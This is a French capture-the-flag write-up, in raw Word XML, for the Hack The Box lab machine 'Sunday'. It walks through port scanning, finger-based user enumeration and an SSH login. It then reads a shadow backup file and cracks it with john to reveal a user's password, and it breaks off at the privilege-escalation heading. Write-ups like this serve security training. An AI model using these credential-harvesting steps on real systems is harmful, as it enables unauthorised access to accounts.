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91240" w14:textId="45F02743" w:rsidR="00E211E5" w:rsidRDefault="008C403F">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F1FF7" w14:textId="301C2F95" w:rsidR="008C403F" w:rsidRPr="00923C1E" w:rsidRDefault="008C403F" w:rsidP="00923C1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923C1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B853EBC" w14:textId="77777777" w:rsidR="00A600A9" w:rsidRDefault="00A600A9"/>
    <w:p w14:paraId="445A3847" w14:textId="00B51A74" w:rsidR="008C403F" w:rsidRDefault="00923C1E">
      <w:r>
        <w:t>Sunday est une machine Solaris dont l’adresse IP est 10.10.10.76</w:t>
      </w:r>
      <w:r w:rsidR="00B60FC6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00425C78">
        <w:t xml:space="preserve"> L’accès utilisateur peut prendre un certain temps, mais une fois sur le bon port, c’est rapide.</w:t>
      </w:r>
      <w:r w:rsidR="00B60FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00425C78">
        <w:t xml:space="preserve">L’élévation de privilège n’est pas compliquée, il suffit de jouer avec la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00425C78">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00425C78">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DEDF8" w14:textId="1234A3E2" w:rsidR="008F10EC" w:rsidRDefault="008F10EC">
      <w:r w:rsidRPr="008F10EC">
        <w:t>https://ech1.netlify.app/htb/easy/18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE8F65" w14:textId="2D80893B" w:rsidR="00B60FC6" w:rsidRDefault="00B60FC6">
      <w:r>
        <w:t>Compétences mises en œuvre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D772C" w14:textId="44E0F5E1" w:rsidR="00B60FC6" w:rsidRDefault="006C4541" w:rsidP="006C4541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054590C8" w14:textId="296F2568" w:rsidR="00EE6D95" w:rsidRDefault="00E04985" w:rsidP="006C4541">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumération des identifiants d’un service ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FAD5C2" w14:textId="027B6ABF" w:rsidR="00A14808" w:rsidRDefault="00A14808" w:rsidP="006C4541">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cracking de mot de passe</w:t>
      </w:r>
      <w:r w:rsidR="006817A3">
        <w:t xml:space="preserve"> (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006817A3">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006817A3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006817A3">
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006817A3">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75DE4A" w14:textId="6322971A" w:rsidR="00A14808" w:rsidRDefault="00002681" w:rsidP="006C4541">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumération et abus des droits de l’utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F574D5" w14:textId="77777777" w:rsidR="00F13D62" w:rsidRDefault="00F13D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ED9E974" w14:textId="25C162BB" w:rsidR="008C403F" w:rsidRPr="00923C1E" w:rsidRDefault="008C403F" w:rsidP="00923C1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923C1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumération initiale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A563DD3" w14:textId="77777777" w:rsidR="008827D1" w:rsidRDefault="008827D1"/>
    <w:p w14:paraId="4F53E2A9" w14:textId="248E18B2" w:rsidR="008C403F" w:rsidRDefault="00882A2E">
      <w:r>
        <w:t xml:space="preserve">On commence avec une énumération des ports et services avec </w:t>
      </w:r>
      <w:r w:rsidRPr="00580F21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap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882A2E" w14:paraId="67A937AA" w14:textId="77777777" w:rsidTr="001356DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="784E1C86" w14:textId="4E6AC91E" w:rsidR="00882A2E" w:rsidRDefault="00882A2E">
            <w:r>
              <w:t>$ nmap -T4 -A 10.10.10</w:t>
            </w:r>
            <w:r w:rsidR="00090E0A">
              <w:t>.76</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35AD0EC8" w14:textId="77777777" w:rsidR="005C7E34" w:rsidRDefault="005C7E34"/>
    <w:p w14:paraId="208C7143" w14:textId="4B1CEA98" w:rsidR="00882A2E" w:rsidRDefault="005C7E34">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F609E30" w14:textId="6C9AC2F3" w:rsidR="005C7E34" w:rsidRDefault="0070525D">
      <w:r>
        <w:t xml:space="preserve">Il y a </w:t>
      </w:r>
      <w:r w:rsidR="00510EA1">
        <w:t>que deux ports d’ouvert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, nous pouvons refaire un scan pour voir si </w:t>
      </w:r>
      <w:r w:rsidR="001356DF">
        <w:t>d’autres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ports non communs sont utilisés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FE3396" w14:paraId="3013AACE" w14:textId="77777777" w:rsidTr="001356DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="41A34826" w14:textId="045032BE" w:rsidR="00FE3396" w:rsidRDefault="00FE3396">
            <w:r>
              <w:t xml:space="preserve">$ nmap </w:t>
            </w:r>
            <w:r w:rsidR="00175A16">
              <w:t>-T4 -p1-65535</w:t>
            </w:r>
            <w:r w:rsidR="003B7822">
              <w:t xml:space="preserve"> 10.10.10.76</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17B24665" w14:textId="2B50C0FD" w:rsidR="0070525D" w:rsidRDefault="0070525D"/>
    <w:p w14:paraId="540873CA" w14:textId="33E65768" w:rsidR="00FE3396" w:rsidRDefault="00FE3396">
      <w:r>
        <w:t>[nmap2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3F0FF" w14:textId="7ADF9402" w:rsidR="00FE3396" w:rsidRDefault="00664130">
      <w:r>
        <w:t xml:space="preserve">Deux ports apparaissent : le port </w:t>
      </w:r>
      <w:r w:rsidRPr="00580F21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>22022</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3580">
        <w:t>fait tourner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006237F0" w:rsidRPr="00580F21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SunSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE37F2">
        <w:t>, et l’autre port semble bloqué.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231B28FB" w14:textId="77777777" w:rsidR="001F27A2" w:rsidRDefault="001F27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390E00B" w14:textId="2BA63A66" w:rsidR="008C403F" w:rsidRPr="00923C1E" w:rsidRDefault="008C403F" w:rsidP="00923C1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923C1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E257D" w14:textId="77777777" w:rsidR="00A61CAE" w:rsidRDefault="00A61CAE"/>
    <w:p w14:paraId="0F6B7455" w14:textId="3C88F167" w:rsidR="008C403F" w:rsidRDefault="00A61CAE">
      <w:r>
        <w:t>Nous allons tenter une énumération d’utilis</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">ateur sur le </w:t>
      </w:r>
      <w:r w:rsidR="006D36FE">
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="006D36FE" w:rsidRPr="007B7FB0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>79</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avec un programme perl </w:t>
      </w:r>
      <w:r w:rsidR="00E3337A">
        <w:t xml:space="preserve">que l’on clone depuis </w:t>
      </w:r>
      <w:r w:rsidR="003659FA">
        <w:t xml:space="preserve">le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E3337A">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003659FA">
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003659FA" w:rsidRPr="007B7FB0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pentestmonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E3337A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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E3337A" w14:paraId="0F9586B0" w14:textId="77777777" w:rsidTr="0027792D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="36BE5DEC" w14:textId="45C9AFB9" w:rsidR="00E3337A" w:rsidRDefault="00E3337A">
            <w:r>
              <w:t xml:space="preserve">$ git clone </w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00E555AA">
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte"/>
                </w:rPr>
                <w:t>https://github.com/pentestmonkey/finger-user-enum</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7480E31B" w14:textId="489044B5" w:rsidR="00E3337A" w:rsidRDefault="00E3337A">
            <w:r>
              <w:t>$ perl finger-user-enum.pl –U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wordlists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/rockyou.txt –t 10.10.10.76</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3460CC94" w14:textId="77777777" w:rsidR="00E3337A" w:rsidRDefault="00E3337A"/>
    <w:p w14:paraId="61A8B5AF" w14:textId="7F108CC4" w:rsidR="00E3337A" w:rsidRDefault="00E3337A">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1AF222" w14:textId="5A9C7663" w:rsidR="004273F9" w:rsidRDefault="004273F9">
      <w:r>
        <w:t xml:space="preserve">Nous avons deux utilisateurs : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D903A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sammy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D903A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sunny</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. En tentant de se connecter sur le port non conventionnel </w:t>
      </w:r>
      <w:r w:rsidRPr="00D903A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>22022</w:t>
      </w:r>
      <w:r>
        <w:t>, nous avons un problème</w:t>
      </w:r>
      <w:r w:rsidR="00C9644C">
        <w:t xml:space="preserve"> (la machine distante étant une Solaris plutôt vieille, nous devons</w:t>
      </w:r>
      <w:r w:rsidR="00D903A0">
        <w:t xml:space="preserve"> activer l’ancien </w:t>
      </w:r>
      <w:r w:rsidR="0027792D">
        <w:t>algorithme)</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461C5BC" w14:textId="1571DECA" w:rsidR="004273F9" w:rsidRDefault="004273F9">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>diffie-hellman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CA381" w14:textId="795FE39F" w:rsidR="004273F9" w:rsidRDefault="004273F9">
      <w:r>
        <w:t xml:space="preserve">Pour le résoudre, il faut ajouter </w:t>
      </w:r>
      <w:r w:rsidR="005127AF">
        <w:t>l’algorithme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>diffie-hellman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans notre </w:t>
      </w:r>
      <w:r w:rsidRPr="00D903A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.ssh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4273F9" w14:paraId="0FDF06E6" w14:textId="77777777" w:rsidTr="005127AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="52F804DA" w14:textId="4A575232" w:rsidR="004273F9" w:rsidRDefault="004273F9">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>echo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> –e </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>"Host 10.10.10.76\n</w:t>
            </w:r>
            <w:r w:rsidR="00F81533">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F81533">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tKexAlgorithms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F81533">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> +diffe-hellman-group1-sha1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00F81533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&gt; ~/.ssh/config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22615E05" w14:textId="77777777" w:rsidR="004273F9" w:rsidRDefault="004273F9"/>
    <w:p w14:paraId="49FE3575" w14:textId="1B7EAB65" w:rsidR="00C9644C" w:rsidRDefault="008870BD">
      <w:r>
        <w:t xml:space="preserve">On arrive à se connecter avec </w:t>
      </w:r>
      <w:r w:rsidR="00C9644C">
        <w:t xml:space="preserve">l’identifiant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9644C" w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sunny</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9644C">
        <w:t xml:space="preserve">. Malheureusement, nous n’avons pas les droits de lire le flag </w:t>
      </w:r>
      <w:r w:rsidR="00C9644C" w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C9644C">
        <w:t xml:space="preserve"> qui est dans le home de </w:t>
      </w:r>
      <w:r w:rsidR="00C9644C" w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sammy</w:t>
      </w:r>
      <w:r w:rsidR="00C9644C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E7160">
        <w:t xml:space="preserve"> Nous allons donc devoir trouver le mot de passe de </w:t>
      </w:r>
      <w:r w:rsidR="003E7160" w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sammy</w:t>
      </w:r>
      <w:r w:rsidR="003E7160"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7C48E4" w14:paraId="05D5C3E4" w14:textId="77777777" w:rsidTr="005127AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="14371466" w14:textId="4A1A49B9" w:rsidR="007C48E4" w:rsidRDefault="004A536F">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sunny@Sunday</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007C48E4">
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007C48E4">
              <w:t>ls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007C48E4">
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="328BF0EB" w14:textId="2E233351" w:rsidR="007C48E4" w:rsidRDefault="004A536F">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sunny@Sunday</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007C48E4">
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007C48E4">
              <w:t>ls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007C48E4">
              <w:t xml:space="preserve"> /backup/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A7C24C" w14:textId="2F3423EF" w:rsidR="007C48E4" w:rsidRDefault="004A536F">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sunny@Sunday</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007C48E4">
              <w:t>$ cat /backup/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007C48E4">
              <w:t>shadow.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18CBEFA5" w14:textId="77777777" w:rsidR="007C48E4" w:rsidRDefault="007C48E4"/>
    <w:p w14:paraId="53C3B668" w14:textId="7D17C555" w:rsidR="007C48E4" w:rsidRDefault="007C48E4">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shadow_backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FFF75A" w14:textId="25C89FFD" w:rsidR="004A536F" w:rsidRDefault="00F151FB">
      <w:r>
        <w:t xml:space="preserve">On récupère le contenu des fichiers </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shadow.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour </w:t>
      </w:r>
      <w:r w:rsidR="004A536F">
        <w:t>cracker le mot de passe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F151FB" w14:paraId="458D372E" w14:textId="77777777" w:rsidTr="005127AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="66663BEE" w14:textId="445C7DD1" w:rsidR="00F151FB" w:rsidRDefault="00F151FB">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vim</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> passwd.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CAE8374" w14:textId="3DFE1481" w:rsidR="00F151FB" w:rsidRDefault="00F151FB">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vim</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shadow.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="05F5DE44" w14:textId="77777777" w:rsidR="00F151FB" w:rsidRDefault="00F151FB">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unshadow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> passwd.txt </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shadow.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002A18CE">
              <w:t xml:space="preserve"> &gt; john_passwd.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67305DD9" w14:textId="0245F503" w:rsidR="002A18CE" w:rsidRDefault="002A18CE">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>john</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> john_passwd.txt –</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wordlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>usr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share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wordlists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/rockyou.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A4C3637" w14:textId="77777777" w:rsidR="00F151FB" w:rsidRDefault="00F151FB"/>
    <w:p w14:paraId="307D7C9E" w14:textId="399EE8B9" w:rsidR="001A1837" w:rsidRDefault="001A1837">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2052D248" w14:textId="362AD163" w:rsidR="001A1837" w:rsidRDefault="001A1837">
      <w:r>
        <w:t xml:space="preserve">Le mot de passe de sammy est : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00057295">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cooldude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00057295">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AFA0A1" w14:textId="69CF6A21" w:rsidR="001A1837" w:rsidRDefault="001A1837">
      <w:r>
        <w:t xml:space="preserve">En utilisant ce mot de passe, nous arrivons à nous connecter en ssh avec </w:t>
      </w:r>
      <w:r w:rsidRPr="005127AF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sammy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et lire le flag user.txt :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55275F96" w14:textId="42E488F1" w:rsidR="001A1837" w:rsidRDefault="001A1837">
      <w:r>
        <w:t>[user.txt]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D610F" w14:textId="77777777" w:rsidR="001F27A2" w:rsidRDefault="001F27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6B4C473" w14:textId="63FFFB6D" w:rsidR="008C403F" w:rsidRPr="00923C1E" w:rsidRDefault="008C403F" w:rsidP="00923C1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923C1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès Administrateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14485B51" w14:textId="77777777" w:rsidR="003F6279" w:rsidRDefault="003F6279"/>
    <w:p w14:paraId="3C4C158C" w14:textId="60A65597" w:rsidR="008C403F" w:rsidRDefault="003F6279">
      <w:r>
